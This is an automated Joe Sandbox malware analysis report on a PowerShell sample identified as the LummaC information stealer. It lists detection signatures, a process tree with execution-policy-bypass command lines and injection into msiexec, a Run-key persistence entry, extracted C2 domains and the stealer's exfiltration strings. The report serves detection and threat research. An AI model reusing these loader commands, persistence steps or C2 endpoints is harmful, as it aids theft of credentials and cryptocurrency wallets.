Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xaSPJNbl.ps1

Overview

General Information

Sample name:xaSPJNbl.ps1
Analysis ID:1558794
MD5:b1c4cb0479a434c478b9e5e38cc42fe0
SHA1:ad45a2bccacb5ae981358cba37260ca3fe4e1e24
SHA256:a4063200b38b2a71b1f70d11a73828ebaadd0db2044cc3fcdc29aabb17341224
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Submitted sample is a known malware sample
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Setup.exe (PID: 348 cmdline: "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe" MD5: AD2735F096925010A53450CB4178C89E)
      • more.com (PID: 4864 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
        • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 6840 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • powershell.exe (PID: 4152 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Setup.exe (PID: 4260 cmdline: "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe" MD5: AD2735F096925010A53450CB4178C89E)
    • more.com (PID: 4028 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1548 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • Setup.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe" MD5: AD2735F096925010A53450CB4178C89E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["processhol.sbs", "p3ar11fter.sbs", "peepburry828.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "5ptit5tuded.cyou"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dllJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bplJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dllJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000A.00000003.2090035846.0000000000763000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0000000A.00000003.2055763748.0000000000765000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 6 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6840, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", ProcessId: 4152, ProcessName: powershell.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6840, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1", ProcessId: 4152, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", ProcessId: 5900, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
                    Sigma detected: Msiexec Initiated Connection
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6840, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5900, TargetFilename: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dll
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1", ProcessId: 5900, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T20:06:24.186580+010020283713Unknown Traffic192.168.2.849709188.114.97.3443TCP
                    2024-11-19T20:06:26.831577+010020283713Unknown Traffic192.168.2.849710188.114.97.3443TCP
                    2024-11-19T20:06:30.348718+010020283713Unknown Traffic192.168.2.849712188.114.97.3443TCP
                    2024-11-19T20:06:31.592852+010020283713Unknown Traffic192.168.2.849713188.114.97.3443TCP
                    2024-11-19T20:06:34.731965+010020283713Unknown Traffic192.168.2.849714188.114.97.3443TCP
                    2024-11-19T20:06:36.510272+010020283713Unknown Traffic192.168.2.849715188.114.97.3443TCP
                    2024-11-19T20:06:37.872566+010020283713Unknown Traffic192.168.2.849716188.114.97.3443TCP
                    2024-11-19T20:06:40.548988+010020283713Unknown Traffic192.168.2.849717188.114.97.3443TCP
                    2024-11-19T20:06:41.473361+010020283713Unknown Traffic192.168.2.849718172.67.75.40443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T20:06:24.636452+010020546531A Network Trojan was detected192.168.2.849709188.114.97.3443TCP
                    2024-11-19T20:06:27.534872+010020546531A Network Trojan was detected192.168.2.849710188.114.97.3443TCP
                    2024-11-19T20:06:40.963062+010020546531A Network Trojan was detected192.168.2.849717188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T20:06:24.636452+010020498361A Network Trojan was detected192.168.2.849709188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T20:06:27.534872+010020498121A Network Trojan was detected192.168.2.849710188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T20:06:36.881578+010020480941Malware Command and Control Activity Detected192.168.2.849715188.114.97.3443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://5ptit5tuded.cyou/apiAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 14.2.msiexec.exe.640000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "p3ar11fter.sbs", "peepburry828.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "5ptit5tuded.cyou"]}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\accplReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Local\Temp\ktbReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dllReversingLabs: Detection: 79%
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dllReversingLabs: Detection: 65%
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bplReversingLabs: Detection: 47%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\accplJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\ktbJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: p3ar11fter.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: peepburry828.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: p10tgrace.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: processhol.sbs
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: 5ptit5tuded.cyou
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 0000000A.00000002.2205973170.00000000008E2000.00000002.00000001.01000000.00000000.sdmpString decryptor: Workgroup: -
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA19E8150 ??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,?shared_null@QHashData@@2U1@B,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,??0QString@@QEAA@XZ,?system@QRandomGenerator64@@SAPEAV1@XZ,?_fillRange@QRandomGenerator@@AEAAXPEAX0@Z,?number@QByteArray@@SA?AV1@_KH@Z,?hash@QCryptographicHash@@SA?AVQByteArray@@AEBV2@W4Algorithm@1@@Z,?toHex@QByteArray@@QEBA?AV1@XZ,??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,??1QByteArray@@QEAA@XZ,4_2_00007FFBA19E8150
                    Source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_be6f7231-6
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.8:49718 version: TLS 1.2
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: Setup.exe, 00000004.00000003.1903835083.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.2044770209.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000007.00000002.2085414094.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: Setup.exe, 00000004.00000003.1903835083.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.2044770209.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000007.00000002.2085414094.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1s 1 Nov 2022built on: Fri Feb 3 01:12:04 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\dist\pc64_dll_release\lib\engines-1_1"not available source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: d:\Develop\dev-Milky\libs\mfclibs\ICQSkinUtils\ICQSkinUtils\_dmt\LiteSkinUtils.pdbWW source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: Setup.exe, 00000004.00000002.2052868230.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp, Setup.exe, 00000007.00000002.2086323457.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: wntdll.pdbUGP source: more.com, 00000008.00000002.2013062507.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013369968.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libcrypto-1_1-x64.pdb source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1D15000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04687000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1D15000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000003.1994011222.000002563DEF0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: Setup.exe, 00000004.00000002.1945495653.0000029C06FA0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1942306525.0000029C06BA2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1957372633.0000029C071AD000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2018428447.0000025640912000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013762787.000002564031E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013949015.0000025640710000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2052868230.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp, Setup.exe, 00000007.00000002.2086323457.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: wntdll.pdb source: more.com, 00000008.00000002.2013062507.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013369968.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Core.pdb source: Setup.exe, 00000004.00000002.2020848996.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000007.00000002.2078219554.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Setup.exe, 00000004.00000002.2050358782.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp, Setup.exe, 00000007.00000002.2086102566.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2050358782.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp, Setup.exe, 00000007.00000002.2086102566.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdbete All MessagesKAre you sure that you want to permanently delete all history for this user?!Delete: All history for this user=Are you sure that you want to permanently delete all history? source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: FatalErrorWarningDebugassert.report.fatalassert.report.errorassert.report.warningassert.report.debugassert.report.unknownasserts already initializedeax::foundation::initAssertionssAssertFailureFn == nullptr.pdb source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\Projects\WinRAR\rar\build\unrardll32\Release\UnRAR.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Setup.exe, 00000004.00000002.2055448652.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp, Setup.exe, 00000007.00000002.2086516653.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: .pdb.map.___> => > source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libssl-1_1-x64.pdb source: Setup.exe, 00000004.00000002.2039104912.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2084518585.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: ntdll.pdb source: Setup.exe, 00000004.00000002.1945495653.0000029C06FA0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1942306525.0000029C06BA2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1957372633.0000029C071AD000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2018428447.0000025640912000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013762787.000002564031E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013949015.0000025640710000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Network.pdb source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\eaSteamProxy\pc64-vc-tool-opt\bin\EASteamProxy.pdb source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: d:\Develop\dev-Milky\libs\mfclibs\ICQSkinUtils\ICQSkinUtils\_dmt\LiteSkinUtils.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
